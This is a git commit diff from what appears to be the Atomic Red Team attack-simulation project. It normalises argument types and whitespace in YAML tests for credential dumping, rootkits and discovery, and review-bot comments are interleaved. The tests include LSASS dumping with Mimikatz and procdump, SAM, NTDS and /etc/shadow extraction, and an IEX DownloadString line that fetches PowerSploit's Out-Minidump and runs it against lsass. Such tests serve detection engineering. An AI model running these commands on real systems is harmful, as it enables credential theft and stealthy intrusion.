fix: Updating atomics YAML file structure to align with the new JSON schema definition (#2323)

* fix: Updating atomics YAML file structure to align with the new JSON schema definition.

This also fixes some white space issues and general line formatting across all impacted atomics.

* fix: One additional change needed

---------

Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Josh Rickard
2023-02-13 17:10:37 -06:00
committed by GitHub
parent 78bd56f47a
commit a5dd0813cd
228 changed files with 3229 additions and 3271 deletions
+16 -16
@@ -15,11 +15,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
@@ -88,12 +88,12 @@ atomic_tests:
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
@@ -146,11 +146,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the Lsass dump
type: Path
type: path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: String
type: string
default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
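Review bot: `mimikatz_exe` in this hunk keeps `type: string` even though its description is "Path of the Mimikatz binary" and the other executable arguments in this file (`procdump_exe`, `dumpert_exe`) are now `type: path`; consider `type: path` here too so the schema treats every binary-location argument the same way.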
@@ -224,8 +224,8 @@ atomic_tests:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
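Review bot: the `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1')` line (unchanged apart from whitespace) fetches the script from the `master` branch, so what this test actually executes can change without any edit to this file; pinning the URL to a commit, as the `remote_script` default in the `@@ -280,7 +280,7 @@` hunk below already does for Invoke-Mimikatz, keeps the test reproducible and auditable.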
@@ -244,11 +244,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
@@ -280,7 +280,7 @@ atomic_tests:
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
@@ -291,7 +291,7 @@ atomic_tests:
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
supported_platforms:
- windows
@@ -311,7 +311,7 @@ atomic_tests:
cleanup_command: |
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
@@ -325,11 +325,11 @@ atomic_tests:
input_arguments:
xordump_exe:
description: Path to xordump
type: Path
type: path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
+11 -11
@@ -66,15 +66,15 @@ atomic_tests:
input_arguments:
file_path:
description: Path to the file to copy
type: Path
type: path
default: '%SystemRoot%/system32/config/SAM'
file_name:
description: Name of the copied file
type: String
type: string
default: SAM
copy_dest:
description: Destination of the copied file
type: String
type: string
default: '%temp%'
executor:
command: |
@@ -83,7 +83,7 @@ atomic_tests:
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
@@ -112,17 +112,17 @@ atomic_tests:
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
type: integer
default: 10
executor:
command: |
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
name: command_prompt
elevation_required: false
elevation_required: false
cleanup_command: |
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
@@ -135,11 +135,11 @@ atomic_tests:
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
type: integer
default: 10
executor:
command: |
@@ -148,12 +148,12 @@ atomic_tests:
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
name: powershell
elevation_required: false
elevation_required: false
cleanup_command: |
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
- name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
+13 -13
@@ -12,7 +12,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:'
dependencies:
- description: |
@@ -42,11 +42,11 @@ atomic_tests:
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
type: string
default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
extract_path:
description: Path for extracted NTDS.dit
type: Path
type: path
default: C:\Windows\Temp
dependencies:
- description: |
@@ -94,7 +94,7 @@ atomic_tests:
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
type: path
default: C:\Windows\Temp\ntds_T1003
dependencies:
- description: |
@@ -123,7 +123,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
type: string
default: 'C:\'
dependencies:
- description: |
@@ -148,11 +148,11 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
type: string
default: 'C:\'
target_host:
description: IP Address / Hostname you want to target
type: String
type: string
default: localhost
dependencies:
- description: |
@@ -177,15 +177,15 @@ atomic_tests:
input_arguments:
source_path:
description: File to shadow copy
type: String
type: string
default: 'c:\windows\ntds\ntds.dit'
target_path:
description: Target path of the result file
type: String
type: string
default: 'c:\ntds.dit'
target_host:
description: IP Address / Hostname you want to target
type: String
type: string
default: localhost
dependencies:
- description: |
@@ -211,7 +211,7 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:\'
executor:
command: |
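Review bot: the `drive_letter` description in this hunk says "(including colon)" but the default is `'C:\'`, which also carries a trailing backslash; the two earlier hunks with the same default describe it as "(including colon and backslash)", so the wording here should match, or the default should drop the backslash if this executor expects plain `C:`.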
@@ -230,11 +230,11 @@ atomic_tests:
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
type: string
default: 'C:'
symlink_path:
description: symlink path
type: String
type: string
default: 'C:\Temp\vssstore'
executor:
command: |
+1 -1
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
psexec_exe:
description: Path to PsExec executable
type: Path
type: path
default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
dependency_executor_name: powershell
dependencies:
+6 -6
@@ -9,19 +9,19 @@ atomic_tests:
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
- windows
input_arguments:
domain:
description: Targeted Active Directory domain
type: String
type: string
default: '%userdnsdomain%'
user:
description: Targeted user
type: String
type: string
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
@@ -56,7 +56,7 @@ atomic_tests:
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
type: string
default: $ENV:logonserver.TrimStart("\")
dependency_executor_name: powershell
dependencies:
@@ -72,4 +72,4 @@ atomic_tests:
command: |
Get-ADReplAccount -All -Server #{logonserver}
name: powershell
elevation_required: False
elevation_required: false
+33 -34
@@ -1,4 +1,3 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
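Review bot: dropping the leading `---` document marker is harmless for a single-document YAML file, but no other file in this diff shows the marker being removed, so it is worth confirming the remaining atomics are consistent either way; a mix of files with and without it will trip any linter rule on document-start markers.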
@@ -9,31 +8,31 @@ atomic_tests:
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
type: path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
type: string
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
@@ -57,41 +56,41 @@ atomic_tests:
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
type: path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
type: path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
type: string
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
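Review bot: the `python_script` description in this hunk ("Path to script generating the target process") is a copy of the `script_path` description, but its default is `PathToAtomicsFolder/T1003.007/src/dump_heap.py`, the script that reads the heap; suggest wording such as "Path to the Python script that dumps the target process heap".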
@@ -116,11 +115,11 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.007Test3.txt
MimiPenguin_Location:
description: Path of MimiPenguin script
type: Path
type: path
default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh
dependency_executor_name: sh
dependencies:
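Review bot: `MimiPenguin_Location` is the only input argument in this diff that is not snake_case; if the schema does not constrain argument names this is only a style point, but renaming it to `mimipenguin_location` would require the matching `#{MimiPenguin_Location}` references in the executor (not visible in this hunk) to be updated in the same change.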
+6 -6
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -29,7 +29,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -43,11 +43,11 @@ atomic_tests:
description: |
Dump /etc/passwd and /etc/shadow using ed
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
@@ -61,11 +61,11 @@ atomic_tests:
description: |
Dump /etc/passwd and /etc/shadow using bash builtins
supported_platforms:
- linux
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: /tmp/T1003.008.txt
executor:
command: |
+10 -10
@@ -18,15 +18,15 @@ atomic_tests:
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
type: path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: Url
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
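Review bot: `gsecdump_bin_hash` is described only as "File hash of the Gsecdump binary file"; the default is a 64-hex-character value, i.e. SHA-256 length, so naming the algorithm in the description tells anyone overriding `gsecdump_exe` which digest to supply for the prerequisite check.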
@@ -58,7 +58,7 @@ atomic_tests:
- windows
dependency_executor_name: powershell
dependencies:
- description: NPPSpy.dll must be available in local temp directory
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -85,13 +85,13 @@ atomic_tests:
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
@@ -107,8 +107,8 @@ atomic_tests:
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -127,8 +127,8 @@ atomic_tests:
- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
description: |-
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
supported_platforms:
- windows
dependency_executor_name: powershell
+1 -1
@@ -18,7 +18,7 @@ atomic_tests:
input_arguments:
volume:
description: Drive letter of the volume to access
type: String
type: string
default: 'C:'
executor:
command: |
+1 -1
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path of file to hold net.exe output
type: Path
type: path
default: '%temp%\service-list.txt'
executor:
command: |
+2 -2
@@ -12,11 +12,11 @@ atomic_tests:
input_arguments:
input_source_code:
description: Path to source of C# code
type: Path
type: path
default: PathToAtomicsFolder\T1010\src\T1010.cs
output_file_name:
description: Name of output binary
type: String
type: string
default: '%TEMP%\T1010.exe'
dependency_executor_name: powershell
dependencies:
+4 -4
@@ -39,15 +39,15 @@ atomic_tests:
- name: Enumerate COM Objects in Registry with Powershell
auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
description: |-
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
supported_platforms:
- windows
input_arguments:
output_file:
description: File to output list of COM objects to
type: String
type: string
default: $env:temp\T1592.002Test1.txt
executor:
command: |
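Review bot: `output_file` in this hunk stays `type: string` while the equivalent `output_file` arguments elsewhere in this change are `type: path`; also, the default `$env:temp\T1592.002Test1.txt` is named after technique T1592.002, which does not match the COM-object enumeration test it belongs to (the file sits between the T1010 and T1014 atomics in this diff), so check whether that filename is intended.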
+13 -13
@@ -10,15 +10,15 @@ atomic_tests:
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: Path
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: String
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: String
type: string
default: T1014
dependency_executor_name: bash
dependencies:
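Review bot: "prerequistes" in the `rootkit_source_path` description is a typo for "prerequisites" (the same line recurs in the next hunk); while touching these lines, `rootkit_path` ("Path To rootkit") could become `type: path` like `rootkit_source_path` instead of `type: string`.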
@@ -52,15 +52,15 @@ atomic_tests:
input_arguments:
rootkit_source_path:
description: Path to the rootkit source. Used when prerequistes are fetched.
type: Path
type: path
default: PathToAtomicsFolder/T1014/src/Linux
rootkit_path:
description: Path To rootkit
type: String
type: string
default: PathToAtomicsFolder/T1014/bin
rootkit_name:
description: Module name
type: String
type: string
default: T1014
dependency_executor_name: bash
dependencies:
@@ -95,15 +95,15 @@ atomic_tests:
input_arguments:
repo:
description: Url of the github repo zip
type: String
type: string
default: https://github.com/gianlucaborello/libprocesshider/
rev:
description: Revision of the github repo zip
type: String
type: string
default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_path:
description: Full path of the library to add to ld.so.preload
type: String
type: string
default: /usr/local/lib/libprocesshider.so
dependency_executor_name: bash
dependencies:
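Review bot: `repo` ("Url of the github repo zip") keeps `type: string` even though this change introduces `type: url` for URL-valued arguments such as `gsecdump_url` and `portfile_url`; the same applies to `repo` in the next hunk, and `library_path` ("Full path of the library to add to ld.so.preload") is a candidate for `type: path`.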
@@ -135,19 +135,19 @@ atomic_tests:
input_arguments:
repo:
description: Url of the diamorphine github repo
type: String
type: string
default: https://github.com/m0nad/Diamorphine/
rev:
description: Revision of the github repo zip
type: String
type: string
default: 898810523aa2033f582a4a5903ffe453334044f9
rootkit_path:
description: Path To rootkit
type: String
type: string
default: /tmp/atomic/Diamorphine
rootkit_name:
description: Module name
type: String
type: string
default: diamorphine
dependency_executor_name: bash
dependencies:
+9 -9
@@ -80,15 +80,15 @@ atomic_tests:
input_arguments:
output_file:
description: Path of file to write port scan results
type: Path
type: path
default: $env:USERPROFILE\Desktop\open-ports.txt
portfile_url:
description: URL to top-128.txt
type: Url
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt
port_file:
description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap.
type: Path
type: path
default: PathToAtomicsFolder\T1016\src\top-128.txt
dependency_executor_name: powershell
dependencies:
@@ -132,7 +132,7 @@ atomic_tests:
name: powershell
- name: Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -140,7 +140,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -163,7 +163,7 @@ atomic_tests:
input_arguments:
recon_commands:
description: File that houses list of commands to be executed
type: Path
type: path
default: PathToAtomicsFolder\T1016\src\qakbot.bat
dependency_executor_name: powershell
dependencies:
@@ -182,9 +182,9 @@ atomic_tests:
auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
description: |
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
supported_platforms:
- macos
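Review bot: the description in this hunk is a `|` literal block, so the `\"Is it on or off?\"` escapes on its second line are not unescaped and will render with the backslashes, and the `"` that opens "This will test" has no closing quote anywhere in the hunk; both look like leftovers from a previously double-quoted scalar and should become plain quotes or be removed.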
@@ -203,5 +203,5 @@ atomic_tests:
- windows
executor:
command: |
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN
name: command_prompt
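Review bot: the executor for this hunk is `name: command_prompt`, but the command `nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN` uses PowerShell's `$env:` syntax, which cmd.exe does not expand, so the query is sent for the literal name `_ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN`; use `%USERDNSDOMAIN%` under command_prompt or switch the executor to powershell.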
+29 -29
@@ -37,7 +37,7 @@ atomic_tests:
input_arguments:
target_domain:
description: Domain to query for domain controllers
type: String
type: string
default: '%userdnsdomain%'
executor:
command: |
@@ -51,21 +51,21 @@ atomic_tests:
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
supported_platforms:
- windows
input_arguments:
start_host:
description: Last octet starting value for ping sweep.
type: String
default: "1"
stop_host:
description: Last octet ending value for ping sweep.
type: String
default: "254"
subnet:
description: Subnet used for ping sweep.
type: String
default: 192.168.1
executor:
command: |
input_arguments:
start_host:
description: Last octet starting value for ping sweep.
type: string
default: "1"
stop_host:
description: Last octet ending value for ping sweep.
type: string
default: "254"
subnet:
description: Subnet used for ping sweep.
type: string
default: 192.168.1
executor:
command: |
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
name: command_prompt
- name: Remote System Discovery - arp
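Review bot: `start_host` and `stop_host` are numeric loop bounds for `for /l`, and the schema already has `integer` (used for `limit` in the shadow-copy hive hunks earlier in this diff), so typing them `integer` with unquoted defaults would let the schema reject non-numeric input instead of leaving it to cmd.exe at run time.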
@@ -113,15 +113,15 @@ atomic_tests:
input_arguments:
start_host:
description: Subnet used for ping sweep.
type: String
type: string
default: "1"
stop_host:
description: Subnet used for ping sweep.
type: String
type: string
default: "254"
subnet:
description: Subnet used for ping sweep.
type: String
type: string
default: 192.168.1
executor:
command: |
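Review bot: the `start_host` and `stop_host` descriptions in this hunk both read "Subnet used for ping sweep.", copied from `subnet`; the earlier ping-sweep hunk has the right wording ("Last octet starting value for ping sweep." / "Last octet ending value for ping sweep."), so reuse that here.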
@@ -156,15 +156,15 @@ atomic_tests:
input_arguments:
user_name:
description: username including domain.
type: String
type: string
default: 'domain\user'
acct_pass:
description: Account password.
type: String
type: string
default: "password"
host_name:
description: hostname or ip address to connect to.
type: String
type: string
default: "192.168.1.1"
dependency_executor_name: powershell
dependencies:
@@ -193,7 +193,7 @@ atomic_tests:
elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -201,7 +201,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -217,7 +217,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Domain Controller Objects
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
description: |
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -225,7 +225,7 @@ atomic_tests:
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
type: path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
@@ -307,9 +307,9 @@ atomic_tests:
- windows
dependency_executor_name: powershell
dependencies:
- description: This PC must be joined to a domain.
- description: This PC must be joined to a domain.
prereq_command: |-
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
get_prereq_command: |-
write-host "This PC must be manually added to a domain."
executor:
@@ -373,7 +373,7 @@ atomic_tests:
elevation_required: false
command: |
get-wmiobject -class ds_computer -namespace root\directory\ldap
- name: Remote System Discovery - net group Domain Controller
- name: Remote System Discovery - net group Domain Controller
auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
description: |
Identify remote systems with net.exe querying the Active Directory Domain Controller.
+2 -2
@@ -12,11 +12,11 @@ atomic_tests:
input_arguments:
file:
description: Exfiltration File
type: String
type: string
default: C:\temp\T1020_exfilFile.txt
domain:
description: Destination Domain
type: Url
type: url
default: https://google.com
executor:
command: |-
+12 -12
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
type: string
default: $ENV:logonserver.TrimStart("\")
domain:
description: domain argument default %USERDOMAIN%
type: String
type: string
default: $Env:USERDOMAIN
username:
description: Username argument default %username%
type: String
type: string
default: $ENV:USERNAME
password:
description: Password
type: String
type: string
default: 1password2!
dependencies:
- description: |
@@ -48,15 +48,15 @@ atomic_tests:
description: |
Changing RDP Port to Non Standard Port via Powershell
supported_platforms:
- windows
- windows
input_arguments:
OLD_Remote_Port:
description: Default RDP Listening Port
type: String
type: string
default: "3389"
NEW_Remote_Port:
description: New RDP Listening Port
type: String
type: string
default: "4489"
executor:
command: |
@@ -66,21 +66,21 @@ atomic_tests:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port}
Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore
name: powershell
elevation_required: true
elevation_required: true
- name: Changing RDP Port to Non Standard Port via Command_Prompt
auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
description: |
Changing RDP Port to Non Standard Port via Command_Prompt
supported_platforms:
- windows
- windows
input_arguments:
OLD_Remote_Port:
description: Default RDP Listening Port
type: String
type: string
default: "3389"
NEW_Remote_Port:
description: New RDP Listening Port
type: String
type: string
default: "4489"
executor:
command: |
@@ -90,4 +90,4 @@ atomic_tests:
